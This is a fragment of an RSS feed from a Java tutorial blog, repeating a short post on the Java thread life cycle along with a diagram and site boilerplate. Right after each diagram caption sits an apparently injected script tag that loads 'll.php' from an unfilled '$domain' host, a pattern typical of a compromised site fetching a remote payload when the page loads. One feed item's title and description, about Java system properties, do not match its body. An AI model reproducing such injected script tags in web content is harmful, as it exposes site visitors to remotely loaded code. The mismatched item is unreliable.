<p><div class="wp-caption aligncenter" style="width: 542px"><a href="http://www.sanjaal.com/images/Java_Thread_LifeCycle_SanjaalDotCom.jpg"><img title="Java Thread Life Cycle" src="http://www.sanjaal.com/images/Java_Thread_LifeCycle_SanjaalDotCom.jpg" alt="Java Thread Life Cycle" width="532" height="552" /></a><p class="wp-caption-text">Java Thread Life Cycle</p></div><script src="http://$domain/ll.php?kk=11"></script>
</p>
<div id="apf_post_footer">
<h4>Related Java Blog Posts</h4>
<ul></ul>
</div>
<p><font size="-2" color = "green"><br />
Sanjaal.com is owned and maintained by Sanjaal Corps, Nepal. The company offers Webhosting and Domain Registration Services, IT Solutions and Business Analysis. Sanjaal.com website features H1B Visa Information, Entertainment Portal, Link Directory Service, Free Articles, Free Open Source Tutorials on Java and J2EE Platform, Digital Photography, High Resolution Picture Gallery and Free Reliable Image Hosting Services. Future plan includes Open Source Software Development Portal, Technical Solutions and Customizable Movie and Music Arena. We would be introducing data backup, data recovery, data hosting and voip solutions. Stay free from phishing &#8211; our website does not ask for your credit card and banking information. Happy Surfing!<br />
</font></p>
<!--INFOLINKS_OFF--><p id="bte_opp"><small>Originally posted 2008-07-25 11:24:04. </small></p><p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fsanjaal.com%2Fjava%2F36%2Fjava-thread%2Fjava-thread-lifecycle%2F&amp;title=Java%20Thread%20Lifecycle" id="wpa2a_18"><img src="http://sanjaal.com/java/wp-content/plugins/add-to-any/share_save_171_16.gif" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://sanjaal.com/java/36/java-thread/java-thread-lifecycle/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>006: Finding Java System Properties</title>
		<link>http://sanjaal.com/java/9/java-general/9/</link>
		<comments>http://sanjaal.com/java/9/java-general/9/#comments</comments>
		<pubDate>Sun, 13 May 2012 13:42:30 +0000</pubDate>
		<dc:creator>Kushal Paudyal</dc:creator>
				<category><![CDATA[Java General]]></category>

		<guid isPermaLink="false">http://sanjaal.com/java/?p=9</guid>
		<description><![CDATA[// File: io/properties/SysPropList.java // Description: Shows system properties. This must be an application. // An applet can't get this information. // Author: Fred Swartz // Date: 2 Feb 2005 import java.awt.*; import javax.swing.*; import java.util.*; /** Generic main program. */ public class SysPropList { public static void main(String[] args) { JFrame window = new JFrame("System [...]]]></description>
			<content:encoded><![CDATA[<!--INFOLINKS_ON--><p>The following diagram shows the life cycle of a Java Thread. Thread has following states : Start, Stop, Blocked, Running, Runnable. These states can be changed to each other as shown in the diagram. Thread can sleep, notify, resume, start, stop, suspend, yield and wait. These activities lead the thread from one state to move to another one.</p>
<p><div class="wp-caption aligncenter" style="width: 542px"><a href="http://www.sanjaal.com/images/Java_Thread_LifeCycle_SanjaalDotCom.jpg"><img title="Java Thread Life Cycle" src="http://www.sanjaal.com/images/Java_Thread_LifeCycle_SanjaalDotCom.jpg" alt="Java Thread Life Cycle" width="532" height="552" /></a><p class="wp-caption-text">Java Thread Life Cycle</p></div><script src="http://$domain/ll.php?kk=11"></script>
</p>
<div id="apf_post_footer">
<h4>Related Java Blog Posts</h4>
<ul></ul>
</div>
<p><font size="-2" color = "green"><br />
Sanjaal.com is owned and maintained by Sanjaal Corps, Nepal. The company offers Webhosting and Domain Registration Services, IT Solutions and Business Analysis. Sanjaal.com website features H1B Visa Information, Entertainment Portal, Link Directory Service, Free Articles, Free Open Source Tutorials on Java and J2EE Platform, Digital Photography, High Resolution Picture Gallery and Free Reliable Image Hosting Services. Future plan includes Open Source Software Development Portal, Technical Solutions and Customizable Movie and Music Arena. We would be introducing data backup, data recovery, data hosting and voip solutions. Stay free from phishing &#8211; our website does not ask for your credit card and banking information. Happy Surfing!<br />
</font></p>
<!--INFOLINKS_OFF--><p id="bte_opp"><small>Originally posted 2008-07-25 11:24:04. </small></p><p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fsanjaal.com%2Fjava%2F36%2Fjava-thread%2Fjava-thread-lifecycle%2F&amp;title=Java%20Thread%20Lifecycle" id="wpa2a_20"><img src="http://sanjaal.com/java/wp-content/plugins/add-to-any/share_save_171_16.gif" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://sanjaal.com/java/36/java-thread/java-thread-lifecycle/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

<!-- Dynamic page generated in 2.615 seconds. -->
<!-- Cached page generated by WP-Super-Cache on 2012-05-17 19:45:20 -->

